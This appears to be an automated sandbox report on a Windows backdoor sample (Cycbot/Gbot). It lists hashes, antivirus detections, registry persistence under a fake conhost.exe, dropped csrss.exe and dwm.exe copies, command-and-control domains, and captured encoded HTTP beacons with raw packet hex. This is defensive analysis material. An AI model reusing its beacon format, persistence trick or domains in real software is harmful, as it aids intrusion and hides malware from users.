Analysis Date2014-12-15 20:49:23
MD507f51ba6b9274a00995d8a784d64d86c
SHA150066cb071ffa927930b88afcc510bf486384f00

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 66b8ee3f43f2dae3fde3e5a6dcd704cc sha1: 28ef847b50c2a0b8f12d9d5e11b3362c55cac5f5 size: 114176
Section.rdata md5: 15fe796071e8a5b8377c8b342a0822a5 sha1: aaa7af6fb42e4961b0337c051f5f7758d0f1a909 size: 1024
Section.data md5: e0c2dc25cda890dd408d2699ccb1d5dd sha1: fcb4f36e49458cfab4375a1d2abba2541a16314a size: 65536
Section.reloc md5: c3516d00bba06bf9d0d28a419bebbf00 sha1: 9650bb88d37aa0876e84665d96086447ed633235 size: 1024
Timestamp2005-10-31 09:12:21
PEhash78448b347325bcad4e90c2a5c0aae620342e62ed
IMPhash06ee11c3ef9119f5a69e18e75a9dfb3a
AV360 SafeGen:Variant.Kazy.38139
AVAd-AwareGen:Variant.Kazy.38139
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.38139
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Variant.Kazy.38139
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-157058
AVDr. WebBackDoor.Gbot.69
AVEmsisoftGen:Variant.Kazy.38139
AVEset (nod32)Win32/Kryptik.TBB
AVFortinetW32/Jorik_Gbot.EBE!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Variant.Kazy.38139
AVGrisoft (avg)Win32/Cryptor
AVIkarusVirus.Win32.Cryptor
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.r
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.38139
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSworldmotoblo.com
Winsock DNSgreenherbalteaonline.com
Winsock DNS127.0.0.1
Winsock DNSfastblogportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSgreenherbalteaonline.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSfreshmediaportal.com
Type: A
DNSfastblogportal.com
Type: A
DNSworldmotoblo.com
Type: A
HTTP GEThttp://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v42=70&tq=gJ4WK%2FSUh7zEhRMw9YLJsMSTUivqg4a8xZNTK%2B%2FbxWq1SfkIYUhF
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3335302e 6769663f   ldingcup350.gif?
0x00000030 (00048)   7634323d 37302674 713d674a 34574b25   v42=70&tq=gJ4WK%
0x00000040 (00064)   32465355 68377a45 68524d77 39594c4a   2FSUh7zEhRMw9YLJ
0x00000050 (00080)   734d5354 55697671 67346138 785a4e54   sMSTUivqg4a8xZNT
0x00000060 (00096)   4b253242 25324662 78577131 53666b49   K%2B%2FbxWq1SfkI
0x00000070 (00112)   59556846 20485454 502f312e 300d0a43   YUhF HTTP/1.0..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000090 (00144)   0d0a486f 73743a20 67726565 6e686572   ..Host: greenher
0x000000a0 (00160)   62616c74 65616f6e 6c696e65 2e636f6d   balteaonline.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a0d0a 68206669    close......h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
]
...
....`%
.i...
L~\.
.
.
080904b0
1.0.0.1
1994
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``"`@<:
^^^^^^
~~~~~~^^^^^^^^^^
========
>>>>>>
>>>>>>>>>>>>>>>>
      
   ;(`
______
_______________
______________________
---------
,,,,,,,
;;;;;;;;;;;
;''''''
:::::::
:::::::::
:::::::::::
???????@@@
////```
//////////////(((((((((((((
""""""""
( `,`@
((((((
((((((((((((!!!!!!
))))))))
[[[[[[[[
]]]]]]
{{{{{{{{{{{{
}}};;;;
}}}}}}}}}}}}
$$$$$$
$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
*******
**************
\\\\\\\\\\\\\\\\
&}}}}}}}
########
#########
%%%%%%
%%%%%%%%%%
+++++++
+++++++++
								
000000000IIIIIIIIII;;;;;;;;;;;;;s
000000WW
000?????????????5
111111111
11111jjjjj^^^^^^^
******,,,,,,,,,111________ddddddpp#@@@@@@@
11wJ#kg
18ZDcK
``1eH0
` 	1}M
1m?Hzm
1x])TB
22222222
2[EV	S
2G^=E2
* @#2Iq[
-2l(@ 
2VZqP<
33333333
333333333
33ZZZjjjjj
{\34.`
3P)DJ%c>2?}
3z66X^
4444444444
(4444444444
:48EDVx
4EfuWbz
@ 4>jP?
4,/NQf
555555555555555555555555
555ZZZZZ
\5I8a'wQ
-5L(`@
5&@ M&
5`S|f,
65:m`5q
666cccXXXX
68np@;C
6F88bR
`@6\s0
6s8DCh*
6T61|k
\6]Xw1
@6\Yw@
77>>>>>>>
777777111111111111111ffff
7777777
77777777
77777777777JJJJJJJJJJCCCCC
,[7A8xb
8888888)))))))iiii
888888g
 8A. `uv;
8jYV]qL
8%rI3(
999999999
9999999999
999999999999
999999999999999
999999999999999999
99VVVVVV
{9<@l:Y
9`z#rs
a2;8G&
/A34Ej
`A6 Nbm@=_
%$[aa0
^^aaaaaa
aaaaaaaa
aaaaaaaaaaaaaaaa
$AAkkk
AF6%&B
af>lQwL
Ag&GXj_?
Ai>y=a&@@px.` w
A{K3AX
aLVuH]%
alXpB${
)Am:F"
#######b
))b;1<J
BB]]]]]]]]\\\
>bbbbbb
%%BBBBBBBb
BBBBBBBBB
>>>>>>~??????BBBBBBBBBBB
b.` `FH_r/TO
}BFKIQ`
-'/,BHy
bli-+"
bn	=S,A*
Br#igkw
BS5F-`
bzj3jp'
C ]1VMFX
 c80Ap
c#@8Aac
cBnBC%.{
@ cc#\
<<CCC2222222222cccccccccccc
||||||[[[[[[[[[[CCCCC
ccccccccccX
cccccfffffffffkkkk
CCCEEEEEEE
c(CH9v
/~cD@{
cN1)2S
CreateFileW
@.data
_d* @b
dCLH,` 
DD2222222
ddddddd
!]ddddddddd
dddddddddd
DDDDDDDDDDD))))+++
ddddddddddVVV
ddddffffffffff
DjS:* 
D*``NW
DuplicateHandle
Dx#JP2.`
e}5#n,
ECCgz<7
eDFgS~]c
`@e,  e"
?eH~8_
+eK?Q?
e.@`l[rf]f)
eruR)gL
EW@1%T/
ExitProcess
EyP<T7
F$@   `
fbQa[0q5
FeFZ[{	
FFFFFeEEEEEEEEEEEEEZZZZZZZZZZZZZZZZZZZaaaaaGGG|||||||
FFFFFFF
?ffffffffffffff
ffffmm
F(I=/`
f;i?bw
FlushInstructionCache
fqqqqqqqqqqqqqqqqqqqqq
FqQxQSY
fSSSSSSSSSSSSSWWWWW
fv=DhAk
#FwP&yYZI
@`_g!<
Ga<f3;
gb30%Z
#$` Gd
GetCurrentProcess
GetCurrentThreadId
GetLastError
GetTempPathW
GetThreadContext
GetVersionExW
gfffffffffQQ
gg9999
gggg,,,
GGGGGGG
GGGGGGGGG
GGGGGGGGGGGIIIIIIII
GGJJ))))^^
:'gIF@
G#ka(@
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
GPiVB/
grmM6|)8
g~sNMtN4p
GT;hJ$
Gt,vlF
@@<GyJ:_
  <g~Z
H,@@)#
+ HGbuVBj
h~GNB|i
=_~Hhd
hhhhhh\\
HHHHHHHeeeee^^^^^^^^^^^^^^^fffffffff
hI=bQq
H!MA0%
hP2M6r
hPm4dE
 @HsS.
huB0dLk2!
'HxtV?
i& `69
}I{)9'm+
"` I)b
 `i<E(
i)H?J(
IIIIIIII
iiiiiiiiiii-----
IIIIIIIIIIIIId
iiiiiiiiiPPPPP
I-MI<J
i.` Wg
I{yL20
J_24~=\
J^9M;r
``je#qk9
JJJJJJJ
JJJJJJJJ^^^^%%%%%
jjjjjjjjj
JJJJJJJJJJJJJJJJJJ
JJJJpppppp
jjjMMMmmmm
?JM5sL3vY-
jO#e74
><jP\#
j(r'e^
(jrR]_4D
jx;N&i!
KERNEL32.dll
#>kES.
KezH	Il
KKKKKK
kkkkkkkkGGGGGGGGG
kkkkkkkkk
KKxxxxxxxkkkkkkkk
+kN24M
K%oKUo
``Kp/ 
Kp~E=o
@`-krD
ksZYd*
L>1l"5,
^L:Am?
\_Lec}
 LG'"@
L?hPAPI
+LLLLL
lllllllll
LLLLLLLLL
lllluuuuuuVVV
L*OeYrn;
l?'x|aPp
LY!!%)t0W;
@ M)4L
MC44y-
M?HXqr
___MMMiiiiiiiiiii
mmmmDDDD
mmmmmBBBUUUUUU
mmmmmm
mmmmmmm
mmmmmmmm
{{{{{{{{mmOOO
n!!!!!!
n\\\\\\\\\\\\\
;\{-\N
*N}"?2
.N4DAt=
`@>na/
N^c& @
NdrByteCountPointerFree
newdev.dll
nFc-%~
nnnc****
;;;;;;;;;;;>>nnnn
nnnnnn
NNNNNNN
NNNNNNNN33hhW\\
NNNNNNNNN
;;;;;;;;;;;nnnnnnnnnnnn
NNNNNNNNNNNN`````
NNNNNNNNNQQQQ
&]nV){&
'}NvyX
n!W6y~
O@6d~x
$\O bN
oHKHc]Z
ohnfj;
??OOOOOOOOOOOhhhhhhh
OOOOOOOOOOOOO
oTwU@*
P-,`@*
@" `p7
PaQo"$
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
pjNj9{
 /!PML^
P\NVZ41u
pO6OCM
pppppp
P)R?jN
p |z5(
 p}zI!
q3esM#
q^)B5=QJ
?{q$Bm
q{*  C6
Qf<U& `
-Qhh|"
qn]I ##
$$$$$$$$$qqqq44444
[[[[[[[[[[[[[[[[[[[[[[qqqqqjjjjj
qqqqqq
QQQQQQ
qqqqqqq888888888888888888H
Q?<)R6
q/UUUUUUUUU*********
Qv5C0W
^q+WFb
Qwf%MP
Q{(` x
qZWy|{B0TPA{P9x
\rbs7M``
`.rdata
@^RD$``H
 rD-HHi
.reloc
rk$	&	/%:
Rm6EHo
@@. @RNR
RPCRT4.dll
rrC'{XjK
R:;rDx6P
RRIIIII
rrrrrrr
rrrrrrrrrrrrrrrr
}r,  u4G?'
}s7eUj
.  sC-
SetLastError
SetLocaleInfoW
SHGetValueW
SHLWAPI.dll
,,,,,,,,,,SSSS
ssssss
ssssssssrrrrrrrr
SSSSSSSSS
sssssssss1111R
SSSSSSSSSSSSSSSS********
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~t
---------T
tbv_z7XbbE
 @t;cM]
@T\DfE
>TFb2_
tf@sKt
!This program cannot be run in DOS mode.
ThRS9`
timeEndPeriod
TlsSetValue
=[t{O!
tP-?=X
tt]?Al
ttt<<<<<<<<<<<<
TTT((((((((((
}tttttt
tttttttt!AAA
tttttttttttt-------
ttttttttttttttttttttttvvv
U6H3lM"@
Uc't+#/
UpdateDriverForPlugAndPlayDevicesW
UuidCreate
!uurHy-
uuuuummmmmmmmmmmmmmmmmmV
UUUUUU
UUUUUUUUU
........uuuuuuuuuuuuuuu
UxF=^Ad
V#############
.~"v2I
v[|3MW
 `v5A}N%J
V~d4KY
VirtualProtectEx
v(@ kXd
VNpWHcWJ
_vpj7;
vvvvvv
VVVVVVVV
VVVVVVVVV
vvvvvvvvvvvv
VVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVV::::::::::::::::::
vX!LI-VJ
` @@vy
WaitForSingleObject
Wbr.P?
wf?2/N
WP&``"@
WriteProcessMemory
~W`UV5xVg
WWWNNN7GG
WWWWW8888
wwwwww2
wwwwwww
wwwwwww))))))))))
wwwwwwww
WWWWWWWWWW
WWWWWWWWWWWWWWW
{@Wy{1
@`x1$@
X*@ %4
XC,@ <
!XJ_%9
xo*``4
)Xr0+it
-x)UH-
xxxx)))
xxxxxx
xxxxxxxx5
xxxxxxxxxxxxxx/////////sssssss
xxxxxxxxxxxxxxxxxxxxxx
xZP~j/
YgWA+{
([Ynh;
>y,@@Oe
	<ySFH
, `YY/
YYYYYuuuuuuuVVVV
YYYYYY					
      z
"z,7SX
z:b&*E
!zBW	I
zCf5w!
Z!f~>Xc
??z!H	
z\hY:ku
/z^iZ{n
 Z|L_j
ZtRHhP^
z|VMh)tKl
Z)/wI" 
zzzzzzzz
zzzzzzzzzzzzzzzdddddddd//
zzzzzzzzzzzzzzzzzzzzzz\\\